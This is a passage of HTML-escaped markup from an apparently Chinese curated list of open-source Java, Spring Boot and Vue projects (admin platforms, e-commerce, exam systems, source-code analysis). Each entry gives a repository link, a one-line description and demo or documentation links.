            &lt;a href=&quot;https://github.com/hectorqin/reader&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;reader&lt;/a&gt; - 一款图书阅读工具。&lt;a href=&quot;https://github.com/hectorqin/reader/blob/master/doc.md&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/wkeyuan/DWSurvey&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;DWSurvey&lt;/a&gt; - 一款简单、高效、成熟、稳定、专业的开源问卷系统。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/topiam/eiam&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;eiam&lt;/a&gt; - 数字身份管控平台。&lt;a href=&quot;https://eiam-console.topiam.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ssssssss-team/spider-flow&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;spider-flow&lt;/a&gt; - 新一代爬虫平台，以图形化方式定义爬虫流程，不写代码即可完成爬虫。&lt;a href=&quot;http://demo.spiderflow.org/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ssssssss-team/magic-api&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;magic-api&lt;/a&gt; - 一个基于 &lt;code&gt;Java&lt;/code&gt; 的接口快速开发框架。&lt;a href=&quot;https://magic-api.ssssssss.org.cn/magic/web/index.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/hiparker/opsli-boot&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;opsli-boot&lt;/a&gt; - 一个基于 &lt;code&gt;SpringBoot&lt;/code&gt;、&lt;code&gt;Vue&lt;/code&gt; 的低代码快速开发平台。&lt;a href=&quot;https://demo.opsli.bedebug.com/#/index&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://wiki.opsli.bedebug.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/TDuckCloud/tduck-platform&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;tduck-platform&lt;/a&gt; &lt;img src=&quot;https://img.shields.io/github/stars/TDuckCloud/tduck-platform?style=social&quot; data-origin=&quot;https://img.shields.io/github/stars/TDuckCloud/tduck-platform?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/forks/TDuckCloud/tduck-platform?style=social&quot; data-origin=&quot;https://img.shields.io/github/forks/TDuckCloud/tduck-platform?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/license/TDuckCloud/tduck-platform&quot; data-origin=&quot;https://img.shields.io/github/license/TDuckCloud/tduck-platform&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/last-commit/TDuckCloud/tduck-platform&quot; data-origin=&quot;https://img.shields.io/github/last-commit/TDuckCloud/tduck-platform&quot; alt=&quot;&quot;/&gt; - 填鸭表单问卷系统。&lt;a href=&quot;https://demo.tduckapp.com/home&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://doc.tduckcloud.com/openSource/index.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/a466350665/smart-sso&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;smart-sso&lt;/a&gt; - 一个基于 &lt;code&gt;SpringBoot&lt;/code&gt; 和 &lt;code&gt;OAuth2&lt;/code&gt; 协议的轻量级、高可用的&lt;strong&gt;单点认证授权中心&lt;/strong&gt;。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/elunez/eladmin&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;eladmin&lt;/a&gt; - 一个基于 &lt;code&gt;SpringBoot&lt;/code&gt;、&lt;code&gt;SpringBoot Jpa&lt;/code&gt;、&lt;code&gt;JWT&lt;/code&gt;、&lt;code&gt;Spring Security&lt;/code&gt;、&lt;code&gt;Redis&lt;/code&gt;、&lt;code&gt;Vue&lt;/code&gt; 的前后端分离的&lt;strong&gt;后台管理系统&lt;/strong&gt;。&lt;a href=&quot;https://eladmin.vip/demo/#/login?redirect=%2Fdashboard&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://eladmin.vip/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/erupts/erupt&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;erupt&lt;/a&gt; - 一个&lt;strong&gt;低代码全栈类&lt;/strong&gt;框架，它使用&lt;code&gt;Java&lt;/code&gt; 注解动态生成页面以及增、删、改、查、权限控制等后台功能。&lt;a href=&quot;https://www.erupt.xyz/demo/#/passport/login&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://www.yuque.com/erupts&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/feiyuchuixue/sz-boot-parent&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;sz-boot-parent&lt;/a&gt; - 一个开源 &lt;code&gt;RBAC&lt;/code&gt; 中后台框架，专为现代应用设计。&lt;a href=&quot;https://preview.szadmin.cn/home/index&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://szadmin.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/wayn111/waynboot-mall&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;waynboot-mall&lt;/a&gt; - 一套全部开源的微商城项目，包含运营后台、&lt;code&gt;H5&lt;/code&gt; 商城前台和服务端接口。&lt;a href=&quot;https://apifox.com/apidoc/shared-f48b11f5-6137-4722-9c70-b9c5c3e5b09b&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/lin_zhao_quan/book_novels&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;book_novels&lt;/a&gt; - &amp;nbsp;基于 &lt;code&gt;SpringBoot&lt;/code&gt; + &lt;code&gt;MybatisPlus&lt;/code&gt; + &lt;code&gt;Jsoup&lt;/code&gt; + &lt;code&gt;MySQL&lt;/code&gt; 实现的小说阅读网站。
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;源码分析项目&quot;&gt;
    &lt;a href=&quot;?id=%e6%ba%90%e7%a0%81%e5%88%86%e6%9e%90%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;源码分析项目&quot;&gt;源码分析项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/coderbruis/JavaSourceCodeLearning&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;JavaSourceCodeLearning&lt;/a&gt; - &lt;code&gt;Java&lt;/code&gt; 流行&lt;strong&gt;框架源码分析&lt;/strong&gt;，学习以及总结。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/doocs/source-code-hunter&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;source-code-hunter&lt;/a&gt; - &lt;code&gt;Spring&lt;/code&gt; 全家桶，&lt;code&gt;Mybatis&lt;/code&gt;、&lt;code&gt;Netty&lt;/code&gt;、&lt;code&gt;Dubbo&lt;/code&gt; 、 &lt;code&gt;Redis&lt;/code&gt;、&lt;code&gt;Tomcat&lt;/code&gt; 中间件等&lt;strong&gt;源码分析&lt;/strong&gt;。&lt;a href=&quot;https://doocs.github.io/source-code-hunter/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/DerekYRC/mini-spring&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;mini-spring&lt;/a&gt; - 简化版的 &lt;code&gt;Spring 框架&lt;/code&gt;，能帮助你快速熟悉 &lt;code&gt;Spring&lt;/code&gt; 源码和掌握 &lt;code&gt;Spring&lt;/code&gt; 的核心原理。抽取了 &lt;code&gt;Spring&lt;/code&gt; 的核心逻辑，代码极度简化，保留&lt;code&gt;Spring&lt;/code&gt; 的核心功能，如 &lt;code&gt;IOC&lt;/code&gt; 和 &lt;code&gt;AOP&lt;/code&gt;、资源加载器、事件监听器、类型转换、容器扩展点、&lt;code&gt;Bean&lt;/code&gt; 生命周期和作用域、应用上下文等核心功能。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/seaswalker/spring-analysis&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;spring-analysis&lt;/a&gt; - &lt;code&gt;Spring&lt;/code&gt; 源码阅读。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/xuchengsheng/spring-reading&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;spring-reading&lt;/a&gt; - &lt;code&gt;Spring&lt;/code&gt; 框架源码阅读。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ygs-code/vue&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue&lt;/a&gt; - &lt;code&gt;Vue&lt;/code&gt; 源码逐行注释分析+40多m的 &lt;code&gt;Vue&lt;/code&gt; 源码程序流程图思维导图。
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;前后端分离项目&quot;&gt;
    &lt;a href=&quot;?id=%e5%89%8d%e5%90%8e%e7%ab%af%e5%88%86%e7%a6%bb%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;前后端分离项目&quot;&gt;前后端分离项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/zfile-dev/zfile&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;zfile&lt;/a&gt; - 基于 &lt;code&gt;Java&lt;/code&gt; 的&lt;strong&gt;在线网盘程序&lt;/strong&gt;，支持对接 &lt;code&gt;S3&lt;/code&gt;、&lt;code&gt;OneDrive&lt;/code&gt;、&lt;code&gt;SharePoint&lt;/code&gt;、又拍云、本地存储、&lt;code&gt;FTP&lt;/code&gt;、&lt;code&gt;SFTP&lt;/code&gt; 等存储源，支持在线浏览图片、播放音视频，文本文件、&lt;code&gt;Office&lt;/code&gt;、&lt;code&gt;obj（3d）&lt;/code&gt;等文件类型。&lt;a href=&quot;https://demo.zfile.vip/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://docs.zfile.vip&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/linlinjava/litemall&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;litemall&lt;/a&gt; - 基于 &lt;code&gt;Spring Boot&lt;/code&gt; 后端 + &lt;code&gt;Vue&lt;/code&gt; 管理员前端 + 微信小程序用户前端 + &lt;code&gt;Vue&lt;/code&gt; 用户移动端的&lt;strong&gt;小商场系统&lt;/strong&gt;。&lt;a href=&quot;https://linlinjava.gitbook.io/litemall&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/lilishop/lilishop&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;lilishop&lt;/a&gt; - 商城系统，后端基于 &lt;code&gt;SpringBoot&lt;/code&gt; 研发，前端使用 &amp;nbsp;&lt;code&gt;Vue&lt;/code&gt;、&lt;code&gt;uniapp&lt;/code&gt; 开发， 前后端分离，支持分布式部署，支持 &lt;code&gt;Docker&lt;/code&gt;，各个 &lt;code&gt;API&lt;/code&gt; 独立。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/wmz1930/Jeebase&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Jeebase&lt;/a&gt; - 前后端分离的开源开发框架，基于 &lt;code&gt;SpringBoot&lt;/code&gt; + &lt;code&gt;Vue&lt;/code&gt;（&lt;code&gt;vue-element-admin&lt;/code&gt;/&lt;code&gt;Ant Design Pro Vue&lt;/code&gt;）开发。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/javahuang/SurveyKing&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;SurveyKing&lt;/a&gt; - 调查问卷系统和考试系统。&lt;a href=&quot;https://wj.surveyking.cn/s/start&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/crmeb/crmeb_java&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;crmeb_java&lt;/a&gt; - 开源商城系统 &lt;code&gt;Java&lt;/code&gt; 版，基于 &lt;code&gt;Java&lt;/code&gt; + &lt;code&gt;Vue&lt;/code&gt; + &lt;code&gt;Uni-app&lt;/code&gt; 开发，在微信公众号、小程序、&lt;code&gt;H5&lt;/code&gt; 移动端都能使用。&lt;a href=&quot;https://admin.java.crmeb.net/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/mindskip/xzs&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;xzs&lt;/a&gt; - 一款 &lt;code&gt;Java&lt;/code&gt; + &lt;code&gt;Vue&lt;/code&gt; 的前后端分离的考试系统。&lt;a href=&quot;https://www.mindskip.net/xzs.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://www.mindskip.net:888/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/201206030/novel&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;novel&lt;/a&gt; - 一套基于时下最新 &lt;code&gt;Java&lt;/code&gt; 技术栈 &lt;code&gt;SpringBoot3&lt;/code&gt; + &lt;code&gt;Vue3&lt;/code&gt; 开发的前后端分离学习型小说项目。&lt;a href=&quot;https://novel.xxyopen.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://docs.xxyopen.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Exrick/xmall&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;xmall&lt;/a&gt; - 基于 &lt;code&gt;SOA&lt;/code&gt; 架构的分布式电商购物商城，前后端分离。&lt;a href=&quot;http://xmall.exrick.cn/#/home&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Hello-hao/Tbed&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Tbed&lt;/a&gt; - 一个由 &lt;code&gt;Java&lt;/code&gt; 语言编写 &lt;code&gt;SpringBoot&lt;/code&gt; 框架开发的开源图像托管程序。&lt;a href=&quot;https://pic.hellohao.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/bestfeng/yimioa&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;yimioa&lt;/a&gt; - 一个基于 &lt;code&gt;SpringBoot&lt;/code&gt; + &lt;code&gt;Vue3&lt;/code&gt; 框架的 &lt;code&gt;OA&lt;/code&gt; 办公系统。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/anji-plus/report&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;report&lt;/a&gt; - 一个完全开源，拖拽编辑的可视化设计工具。&lt;a href=&quot;https://ajreport.beliefteam.cn/index.html#/login&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://ajreport.beliefteam.cn/report-doc/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/wells2333/sg-exam&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;sg-exam&lt;/a&gt; - 基于 &lt;code&gt;Spring Boot&lt;/code&gt; 搭建的新一代&lt;strong&gt;教学管理平台&lt;/strong&gt;，提供权限管理、考试、问卷、练习等功能。&lt;a href=&quot;https://yunmianshi.com.cn/#/home&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/xiaonuobase/Snowy&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Snowy&lt;/a&gt; - 一款国内首个&lt;strong&gt;国密前后分离快速开发平台&lt;/strong&gt;，采用 &lt;code&gt;Vue3&lt;/code&gt; + &lt;code&gt;Ant Design Vue3&lt;/code&gt; + &lt;code&gt;Vite&lt;/code&gt; + &lt;code&gt;SpringBoot&lt;/code&gt; + &lt;code&gt;Mp&lt;/code&gt; + &lt;code&gt;HuTool&lt;/code&gt; + &lt;code&gt;SaToken&lt;/code&gt;.&lt;a href=&quot;https://snowy.xiaonuo.vip/index&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://xiaonuo.vip/doc?catalogueId=1574674492144766978&amp;menuId=1574684190755540994&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/entfrm/entfrm-boot&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;entfrm-boot&lt;/a&gt; &lt;img src=&quot;https://gitee.com/entfrm/entfrm-boot/badge/star.svg?theme=dark&quot; data-origin=&quot;https://gitee.com/entfrm/entfrm-boot/badge/star.svg?theme=dark&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://gitee.com/entfrm/entfrm-boot/badge/fork.svg?theme=dark&quot; data-origin=&quot;https://gitee.com/entfrm/entfrm-boot/badge/fork.svg?theme=dark&quot; alt=&quot;&quot;/&gt; - 一个以模块化为核心的无代码开发平台。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/stylefeng/Guns&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Guns&lt;/a&gt; - 一个现代化的 &lt;code&gt;Java&lt;/code&gt; 应用开发框架，基于主流技术 &lt;code&gt;SpringBoot2&lt;/code&gt; + &lt;code&gt;Vue3&lt;/code&gt;. &lt;a href=&quot;https://www.javaguns.com/gunsDoc?categoryId=1504358893655011330&amp;artId=1504360559456399362&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Yin-Hongwei/music-website&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;music-website&lt;/a&gt; - 一个基于 &lt;code&gt;Vue&lt;/code&gt; + &lt;code&gt;SpringBoot&lt;/code&gt; + &lt;code&gt;MyBatis&lt;/code&gt; 实现的音乐网站。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/lsgwr/spring-boot-online-exam&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;spring-boot-online-exam&lt;/a&gt; - 一个基于 &lt;code&gt;Spring Boot&lt;/code&gt; + &lt;code&gt;Vue&lt;/code&gt; 的在线考试系统。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/siam1026/siam-server&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;siam-server&lt;/a&gt; - 一款 &lt;code&gt;Java&lt;/code&gt; &lt;strong&gt;餐饮点餐系统&lt;/strong&gt;，适用于多门店的连锁品牌，对标蜜雪冰城、瑞幸咖啡。&lt;a href=&quot;https://www.yuque.com/yuqueyonghuwukmla/dczoan&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/xuchengsheng/wx-dump-4j&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;wx-dump-4j&lt;/a&gt; - 一款基于 &lt;code&gt;Java&lt;/code&gt; 开发的微信数据分析工具。&lt;a href=&quot;https://wx.xxccss.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/enilu/web-flash&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;web-flash&lt;/a&gt; - 基于 &lt;code&gt;Spring Boot&lt;/code&gt; 和 &lt;code&gt;Vue.js&lt;/code&gt; 的 &lt;code&gt;Web&lt;/code&gt; 系统，包含了基于 &lt;code&gt;Element&lt;/code&gt; 搭建的后台管理系统和基于 &lt;code&gt;Vux&lt;/code&gt; 搭建的手机端 &lt;code&gt;H5&lt;/code&gt; 站点。&lt;a href=&quot;http://flashadmin.enilu.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;http://webflash.enilu.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;vue2-项目&quot;&gt;
    &lt;a href=&quot;?id=vue2-%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;vue2-项目&quot;&gt;&lt;code&gt;Vue2&lt;/code&gt; 项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Armour/vue-typescript-admin-template&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue-typescript-admin-template&lt;/a&gt; - &lt;strong&gt;后台前端&lt;/strong&gt;解决方案，它基于 &lt;a href=&quot;https://github.com/vuejs/vue&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Vue&lt;/a&gt;, &lt;a href=&quot;https://www.typescriptlang.org/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;TypeScript&lt;/a&gt; 和 &lt;a href=&quot;https://github.com/ElemeFE/element&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Element-UI&lt;/a&gt; 实现。&lt;a href=&quot;https://armour.github.io/vue-typescript-admin-template/#/login?redirect=%2Fdashboard&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/maomao1996/Vue-mmPlayer&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Vue-mmPlayer&lt;/a&gt; - ? 基于 &lt;code&gt;Vue&lt;/code&gt; 的在线音乐播放器。&lt;a href=&quot;https://netease-music.fe-mm.com/#/music/historylist&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/bailicangdu/vue2-happyfri&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue2-happyfri&lt;/a&gt; - 基于&lt;code&gt;Vue2&lt;/code&gt; + &lt;code&gt;Vue-Router&lt;/code&gt; + &lt;code&gt;Vuex&lt;/code&gt; 实现的移动端答题小项目。&lt;a href=&quot;https://cangdu.org/happyfri/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Dafrok/vue-baidu-map&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue-baidu-map&lt;/a&gt; - 百度地图 &lt;code&gt;Vue2&lt;/code&gt; 组件库。&lt;a href=&quot;https://dafrok.github.io/vue-baidu-map/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/nihaojob/vue-fabric-editor&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue-fabric-editor&lt;/a&gt; - 基于 &lt;code&gt;fabric.js&lt;/code&gt; 和 &lt;code&gt;Vue&lt;/code&gt; 的图片编辑器，可自定义字体、素材、设计模板。&lt;a href=&quot;https://nihaojob.gitbook.io/editor/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
